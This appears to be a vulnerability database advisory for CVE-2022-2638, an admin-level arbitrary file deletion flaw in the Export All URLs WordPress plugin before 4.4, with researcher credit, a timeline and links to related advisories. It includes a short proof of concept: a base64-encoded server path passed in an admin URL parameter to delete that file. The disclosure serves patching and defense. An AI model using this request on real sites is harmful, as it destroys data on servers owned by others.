Export All URLs < 4.4 – Admin+ Arbitrary System File Removal | CVE 2022-2638 | Plugin Vulnerabilities

Description

The plugin does not validate the path of the file to be removed on the system which is supposed to be the CSV file. This could allow high privilege users to delete arbitrary file from the server

Proof of Concept

# File to remove: /var/www/vhosts/target/httpdocs/blog/wp-content/uploads/test
# Base64 the full path: L3Zhci93d3cvdmhvc3RzL3RhcmdldC9odHRwZG9jcy9ibG9nL3dwLWNvbnRlbnQvdXBsb2Fkcy90ZXN0


https://example.com/wp-admin/tools.php?page=extract-all-urls-settings&del=y&f=L3Zhci93d3cvdmhvc3RzL3RhcmdldC9odHRwZG9jcy9ibG9nL3dwLWNvbnRlbnQvdXBsb2Fkcy90ZXN0&_wpnonce=NONCE

Affects Plugins

export-all-urls

Fixed in 4.4

References

CVE

Classification

Type

FILE DELETION

OWASP top 10

A6: Security Misconfiguration

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

70840a72-ccdc-4eee-9ad2-874809e5de11

Timeline

Publicly Published

2022-08-08 (about 1 years ago)

Added

2022-08-08 (about 1 years ago)

Last Updated

2023-05-05 (about 1 years ago)

Other

Published

Title

Published

2020-10-07

Title

HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion

Published

2021-11-10

Title

Error Log Viewer Plugin < 1.1.2 - Admin+ Arbitrary File Clearing

Published

2022-11-30

Title

Easy WP SMTP < 1.5.2 - Admin+ Arbitrary File Deletion

Published

2023-12-26

Title

Media File Renamer < 5.7.8 - Admin+ Remote Code Execution

Published

2022-02-16

Title

Login with phone number < 1.3.7 - Unauthenticated remote plugin deletion